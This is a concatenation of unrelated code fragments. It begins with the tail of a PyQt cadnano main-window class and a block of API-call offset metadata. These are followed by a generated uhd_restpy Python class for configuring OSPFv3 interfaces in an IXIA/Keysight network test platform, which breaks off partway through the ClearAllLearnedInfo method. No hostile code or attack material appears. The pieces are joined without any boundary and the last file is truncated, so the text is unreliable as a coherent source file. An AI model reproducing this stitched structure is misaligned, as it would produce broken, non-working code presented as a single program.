since it doesn't seem to work if we treat it like a normal dock widget.
"""
inspector_visible = self.inspector_dock_widget.isVisibleTo(self)
self.action_inspector.setChecked(inspector_visible)
path_visible = self.path_dock_widget.isVisibleTo(self)
self.action_path.setChecked(path_visible)
slice_visible = self.slice_dock_widget.isVisibleTo(self)
self.action_slice.setChecked(slice_visible)
# end def
# end class
| [
"PyQt5.QtWidgets.QWidget",
"cadnano.views.sliceview.tools.slicetoolmanager.SliceToolManager",
"PyQt5.QtWidgets.QApplication.translate",
"cadnano.app",
"PyQt5.QtWidgets.QAction",
"PyQt5.QtWidgets.QWidget.resizeEvent",
"PyQt5.QtWidgets.QWidget.changeEvent",
"cadnano.views.gridview.tools.gridtoolmanager.... | [((1579, 1617), 'PyQt5.QtCore.QSettings', 'QSettings', (['"""cadnano.org"""', '"""cadnano2.5"""'], {}), "('cadnano.org', 'cadnano2.5')\n", (1588, 1617), False, 'from PyQt5.QtCore import QSettings\n'), ((4553, 4585), 'PyQt5.QtWidgets.QWidget.resizeEvent', 'QWidget.resizeEvent', (['self', 'event'], {}), '(self, event)\n', (4572, 4585), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((4629, 4661), 'PyQt5.QtWidgets.QWidget.changeEvent', 'QWidget.changeEvent', (['self', 'event'], {}), '(self, event)\n', (4648, 4661), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((5924, 5970), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.grid_graphics_view'}), '(parent=self.grid_graphics_view)\n', (5938, 5970), False, 'from PyQt5.QtWidgets import QGraphicsScene\n'), ((6641, 6678), 'cadnano.views.gridview.tools.gridtoolmanager.GridToolManager', 'GridToolManager', (['self', 'self.grid_root'], {}), '(self, self.grid_root)\n', (6656, 6678), False, 'from cadnano.views.gridview.tools.gridtoolmanager import GridToolManager\n'), ((6936, 6982), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.path_graphics_view'}), '(parent=self.path_graphics_view)\n', (6950, 6982), False, 'from PyQt5.QtWidgets import QGraphicsScene\n'), ((7835, 7847), 'cadnano.views.pathview.colorpanel.ColorPanel', 'ColorPanel', ([], {}), '()\n', (7845, 7847), False, 'from cadnano.views.pathview.colorpanel import ColorPanel\n'), ((8032, 8069), 'cadnano.views.pathview.tools.pathtoolmanager.PathToolManager', 'PathToolManager', (['self', 'self.path_root'], {}), '(self, self.path_root)\n', (8047, 8069), False, 'from cadnano.views.pathview.tools.pathtoolmanager import PathToolManager\n'), ((8915, 8962), 'PyQt5.QtWidgets.QGraphicsScene', 'QGraphicsScene', ([], {'parent': 'self.slice_graphics_view'}), '(parent=self.slice_graphics_view)\n', (8929, 8962), False, 'from 
PyQt5.QtWidgets import QGraphicsScene\n'), ((9711, 9750), 'cadnano.views.sliceview.tools.slicetoolmanager.SliceToolManager', 'SliceToolManager', (['self', 'self.slice_root'], {}), '(self, self.slice_root)\n', (9727, 9750), False, 'from cadnano.views.sliceview.tools.slicetoolmanager import SliceToolManager\n'), ((10394, 10407), 'PyQt5.QtWidgets.QAction', 'QAction', (['self'], {}), '(self)\n', (10401, 10407), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2247, 2256), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2254, 2256), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2306, 2315), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2313, 2315), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2366, 2375), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2373, 2375), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((2430, 2439), 'PyQt5.QtWidgets.QWidget', 'QWidget', ([], {}), '()\n', (2437, 2439), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10053, 10103), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Undo"""', 'None'], {}), "('MainWindow', 'Undo', None)\n", (10075, 10103), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10141, 10193), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Ctrl+Z"""', 'None'], {}), "('MainWindow', 'Ctrl+Z', None)\n", (10163, 10193), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10227, 10277), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', '"""Redo"""', 'None'], {}), "('MainWindow', 'Redo', None)\n", (10249, 10277), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((10315, 10373), 'PyQt5.QtWidgets.QApplication.translate', 'QApplication.translate', (['"""MainWindow"""', 
'"""Ctrl+Shift+Z"""', 'None'], {}), "('MainWindow', 'Ctrl+Shift+Z', None)\n", (10337, 10373), False, 'from PyQt5.QtWidgets import QAction, QApplication, QWidget\n'), ((1659, 1664), 'cadnano.app', 'app', ([], {}), '()\n', (1662, 1664), False, 'from cadnano import app\n'), ((2489, 2494), 'cadnano.app', 'app', ([], {}), '()\n', (2492, 2494), False, 'from cadnano import app\n'), ((3789, 3794), 'cadnano.app', 'app', ([], {}), '()\n', (3792, 3794), False, 'from cadnano import app\n'), ((5236, 5252), 'PyQt5.QtCore.QSize', 'QSize', (['(1100)', '(800)'], {}), '(1100, 800)\n', (5241, 5252), False, 'from PyQt5.QtCore import QPoint, QSize\n'), ((5304, 5320), 'PyQt5.QtCore.QPoint', 'QPoint', (['(200)', '(200)'], {}), '(200, 200)\n', (5310, 5320), False, 'from PyQt5.QtCore import QPoint, QSize\n'), ((2649, 2654), 'cadnano.app', 'app', ([], {}), '()\n', (2652, 2654), False, 'from cadnano import app\n')] |
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ospfv3(Base):
"""Ospfv3 Interface level Configuration
The Ospfv3 class encapsulates a list of ospfv3 resources that are managed by the user.
A list of resources can be retrieved from the server using the Ospfv3.find() method.
The list can be managed by using the Ospfv3.add() and Ospfv3.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'ospfv3'
_SDM_ATT_MAP = {
'Active': 'active',
'AdjSID': 'adjSID',
'AreaId': 'areaId',
'AreaIdIp': 'areaIdIp',
'AuthAlgo': 'authAlgo',
'BFlag': 'bFlag',
'ConnectedVia': 'connectedVia',
'Count': 'count',
'DeadInterval': 'deadInterval',
'DemandCircuit': 'demandCircuit',
'DescriptiveName': 'descriptiveName',
'EnableAdjSID': 'enableAdjSID',
'EnableAuthentication': 'enableAuthentication',
'EnableBfdRegistration': 'enableBfdRegistration',
'EnableFastHello': 'enableFastHello',
'EnableIgnoreDbDescMtu': 'enableIgnoreDbDescMtu',
'Errors': 'errors',
'ExternalCapability': 'externalCapability',
'GFlag': 'gFlag',
'HelloInterval': 'helloInterval',
'HelloMultiplier': 'helloMultiplier',
'InstanceId': 'instanceId',
'Key': 'key',
'LFlag': 'lFlag',
'LinkMetric': 'linkMetric',
'LocalRouterID': 'localRouterID',
'Multiplier': 'multiplier',
'Name': 'name',
'NetworkType': 'networkType',
'NssaCapability': 'nssaCapability',
'Ospfv3IfaceState': 'ospfv3IfaceState',
'Ospfv3NeighborState': 'ospfv3NeighborState',
'PFlag': 'pFlag',
'Priority': 'priority',
'Router': 'router',
'SaId': 'saId',
'SessionInfo': 'sessionInfo',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TypeAreaId': 'typeAreaId',
'V6': 'v6',
'VFlag': 'vFlag',
'Weight': 'weight',
}
    def __init__(self, parent):
        """Initialize this ospfv3 node under the given parent resource."""
        super(Ospfv3, self).__init__(parent)
@property
def Connector(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
return Connector(self)
@property
def LearnedInfo(self):
"""
Returns
-------
- obj(uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100.LearnedInfo): An instance of the LearnedInfo class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from uhd_restpy.testplatform.sessions.ixnetwork.topology.learnedinfo.learnedinfo_ff4d5e5643a63bccb40b6cf64fc58100 import LearnedInfo
return LearnedInfo(self)
@property
def Active(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def AdjSID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): An Adjacency Segment Identifier (Adj-SID) represents a router adjacency in Segment Routing
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AdjSID']))
@property
def AreaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): OSPFv3 Area ID for a non-connected interface, displayed in Interger format
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AreaId']))
@property
def AreaIdIp(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): OSPFv3 Area ID for a non-connected interface, displayed in IP Address format
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AreaIdIp']))
@property
def AuthAlgo(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Authentication Algorithms
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['AuthAlgo']))
@property
def BFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): B Flag: Backup Flag: If set, the Adj-SID refers to an adjacency that is eligible for protection
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BFlag']))
@property
def ConnectedVia(self):
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DeadInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Dead Interval
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DeadInterval']))
@property
def DemandCircuit(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 5
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DemandCircuit']))
@property
def DescriptiveName(self):
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def EnableAdjSID(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Makes the Adjacency Segment Identifier (Adj-SID) available
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableAdjSID']))
@property
def EnableAuthentication(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Authentication
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableAuthentication']))
@property
def EnableBfdRegistration(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable BFD Registration
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableBfdRegistration']))
@property
def EnableFastHello(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Enable Fast Hello
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableFastHello']))
@property
def EnableIgnoreDbDescMtu(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Ignore DB-Desc MTU
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableIgnoreDbDescMtu']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def ExternalCapability(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 1
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ExternalCapability']))
@property
def GFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): G-Flag: Group Flag: If set, the G-Flag indicates that the Adj-SID refers to a group of adjacencies where it may be assigned
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['GFlag']))
@property
def HelloInterval(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Interval
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloInterval']))
@property
def HelloMultiplier(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Hello Multiplier
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HelloMultiplier']))
@property
def InstanceId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Instance ID
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['InstanceId']))
@property
def Key(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Key
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Key']))
@property
def LFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): L-Flag: Local Flag. If set, then the value/index carried by the SID has local significance
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LFlag']))
@property
def LinkMetric(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Link Metric
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['LinkMetric']))
@property
def LocalRouterID(self):
"""
Returns
-------
- list(str): Router ID
"""
return self._get_attribute(self._SDM_ATT_MAP['LocalRouterID'])
@property
def Multiplier(self):
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def NetworkType(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Network Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NetworkType']))
@property
def NssaCapability(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 3
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NssaCapability']))
@property
def Ospfv3IfaceState(self):
"""
Returns
-------
- list(str[backup | down | dr | drOther | pointToPoint | unrecognized | waiting]): Logs additional information about the Interface State
"""
return self._get_attribute(self._SDM_ATT_MAP['Ospfv3IfaceState'])
@property
def Ospfv3NeighborState(self):
"""
Returns
-------
- list(str[attempt | down | exchange | exStart | full | init | loading | multiNeighbor | none | twoWay]): Logs additional information about the Neighbor State
"""
return self._get_attribute(self._SDM_ATT_MAP['Ospfv3NeighborState'])
@property
def PFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): P-Flag:Persistent Flag: If set, the SID is persistently allocated. The SID value remains consistent across router restart and session/interface flap
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['PFlag']))
@property
def Priority(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Priority (when DR/BDR)
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Priority']))
@property
def Router(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 4
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Router']))
@property
def SaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Security Association ID
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SaId']))
@property
def SessionInfo(self):
"""
Returns
-------
- list(str[ifaceSessInfoAllNbrIn2Way | ifaceSessInfoAllNbrInattempt | ifaceSessInfoAllNbrInDown | ifaceSessInfoAllNbrInExchange | ifaceSessInfoAllNbrInExStart | ifaceSessInfoAllNbrInInit | ifaceSessInfoAllNbrInLoading | ifaceSessInfoFsmNotStarted | ifaceSessInfoSameNbrId | iPAddressNotRcvd | none]): Logs additional information about the session state
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionInfo'])
@property
def SessionStatus(self):
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def TypeAreaId(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Area ID Type
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TypeAreaId']))
@property
def V6(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Option bit 0
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['V6']))
@property
def VFlag(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): V-Flag: Value flag. If set, then the SID carries an absolute value label value
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VFlag']))
@property
def Weight(self):
"""
Returns
-------
- obj(uhd_restpy.multivalue.Multivalue): Weight of the SID for the purpose of load balancing
"""
from uhd_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Weight']))
    def update(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
        """Updates ospfv3 resource on the server.
        This method has some named parameters with a type: obj (Multivalue).
        The Multivalue class has documentation that details the possible values for those named parameters.
        Args
        ----
        - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
        - Multiplier (number): Number of layer instances per parent instance (multiplier)
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # locals() captures the named parameters above; _map_locals filters them
        # through _SDM_ATT_MAP, so only explicitly-passed values are sent.
        return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
    def add(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
        """Adds a new ospfv3 resource on the server and adds it to the container.
        Args
        ----
        - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
        - Multiplier (number): Number of layer instances per parent instance (multiplier)
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
        Returns
        -------
        - self: This instance with all currently retrieved ospfv3 resources using find and the newly added ospfv3 resources available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # locals() captures the named parameters above; _map_locals filters them
        # through _SDM_ATT_MAP, so only explicitly-passed values are sent.
        return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
    def remove(self):
        """Deletes all the contained ospfv3 resources in this instance from the server.
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        # Deletes server-side; returns None by design (stdlib mutator convention).
        self._delete()
    def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, LocalRouterID=None, Multiplier=None, Name=None, Ospfv3IfaceState=None, Ospfv3NeighborState=None, SessionInfo=None, SessionStatus=None, StackedLayers=None, StateCounts=None, Status=None):
        """Finds and retrieves ospfv3 resources from the server.
        All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ospfv3 resources from the server.
        To retrieve an exact match ensure the parameter value starts with ^ and ends with $
        By default the find method takes no parameters and will retrieve all ospfv3 resources from the server.
        Args
        ----
        - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
        - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
        - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
        - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
        - LocalRouterID (list(str)): Router ID
        - Multiplier (number): Number of layer instances per parent instance (multiplier)
        - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
        - Ospfv3IfaceState (list(str[backup | down | dr | drOther | pointToPoint | unrecognized | waiting])): Logs additional information about the Interface State
        - Ospfv3NeighborState (list(str[attempt | down | exchange | exStart | full | init | loading | multiNeighbor | none | twoWay])): Logs additional information about the Neighbor State
        - SessionInfo (list(str[ifaceSessInfoAllNbrIn2Way | ifaceSessInfoAllNbrInattempt | ifaceSessInfoAllNbrInDown | ifaceSessInfoAllNbrInExchange | ifaceSessInfoAllNbrInExStart | ifaceSessInfoAllNbrInInit | ifaceSessInfoAllNbrInLoading | ifaceSessInfoFsmNotStarted | ifaceSessInfoSameNbrId | iPAddressNotRcvd | none])): Logs additional information about the session state
        - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
        - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
        - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
        - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
        Returns
        -------
        - self: This instance with matching ospfv3 resources retrieved from the server available through an iterator or index
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # locals() captures the named filter parameters above; _map_locals filters
        # them through _SDM_ATT_MAP, so only explicitly-passed values are matched.
        return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
    def read(self, href):
        """Retrieves a single instance of ospfv3 data from the server.
        Args
        ----
        - href (str): An href to the instance to be retrieved
        Returns
        -------
        - self: This instance with the ospfv3 resources from the server available through an iterator or index
        Raises
        ------
        - NotFoundError: The requested resource does not exist on the server
        - ServerError: The server has encountered an uncategorized error condition
        """
        return self._read(href)
    def get_device_ids(self, PortNames=None, Active=None, AdjSID=None, AreaId=None, AreaIdIp=None, AuthAlgo=None, BFlag=None, DeadInterval=None, DemandCircuit=None, EnableAdjSID=None, EnableAuthentication=None, EnableBfdRegistration=None, EnableFastHello=None, EnableIgnoreDbDescMtu=None, ExternalCapability=None, GFlag=None, HelloInterval=None, HelloMultiplier=None, InstanceId=None, Key=None, LFlag=None, LinkMetric=None, NetworkType=None, NssaCapability=None, PFlag=None, Priority=None, Router=None, SaId=None, TypeAreaId=None, V6=None, VFlag=None, Weight=None):
        """Base class infrastructure that gets a list of ospfv3 device ids encapsulated by this object.
        Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.
        Args
        ----
        - PortNames (str): optional regex of port names
        - Active (str): optional regex of active
        - AdjSID (str): optional regex of adjSID
        - AreaId (str): optional regex of areaId
        - AreaIdIp (str): optional regex of areaIdIp
        - AuthAlgo (str): optional regex of authAlgo
        - BFlag (str): optional regex of bFlag
        - DeadInterval (str): optional regex of deadInterval
        - DemandCircuit (str): optional regex of demandCircuit
        - EnableAdjSID (str): optional regex of enableAdjSID
        - EnableAuthentication (str): optional regex of enableAuthentication
        - EnableBfdRegistration (str): optional regex of enableBfdRegistration
        - EnableFastHello (str): optional regex of enableFastHello
        - EnableIgnoreDbDescMtu (str): optional regex of enableIgnoreDbDescMtu
        - ExternalCapability (str): optional regex of externalCapability
        - GFlag (str): optional regex of gFlag
        - HelloInterval (str): optional regex of helloInterval
        - HelloMultiplier (str): optional regex of helloMultiplier
        - InstanceId (str): optional regex of instanceId
        - Key (str): optional regex of key
        - LFlag (str): optional regex of lFlag
        - LinkMetric (str): optional regex of linkMetric
        - NetworkType (str): optional regex of networkType
        - NssaCapability (str): optional regex of nssaCapability
        - PFlag (str): optional regex of pFlag
        - Priority (str): optional regex of priority
        - Router (str): optional regex of router
        - SaId (str): optional regex of saId
        - TypeAreaId (str): optional regex of typeAreaId
        - V6 (str): optional regex of v6
        - VFlag (str): optional regex of vFlag
        - Weight (str): optional regex of weight
        Returns
        -------
        - list(int): A list of device ids that meets the regex criteria provided in the method parameters
        Raises
        ------
        - ServerError: The server has encountered an uncategorized error condition
        """
        # locals() must be the raw parameter mapping — do not introduce local
        # variables before this call or they would be passed along as filters.
        return self._get_ngpf_device_ids(locals())
def Abort(self, *args, **kwargs):
"""Executes the abort operation on the server.
Abort CPF control plane (equals to demote to kUnconfigured state).
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
abort(SessionIndices=list)
--------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
abort(SessionIndices=string)
----------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('abort', payload=payload, response_object=None)
def ClearAllLearnedInfo(self, *args, **kwargs):
"""Executes the clearAllLearnedInfo operation on the server.
Clear All Learned Info
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
clearAllLearnedInfo(SessionIndices=list)
----------------------------------------
- SessionIndices (list(number)): This parameter requires an array of session numbers 1 2 3
clearAllLearnedInfo(SessionIndices=string)
------------------------------------------
- SessionIndices (str): This parameter requires a string of session numbers 1-4;6;7-12
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
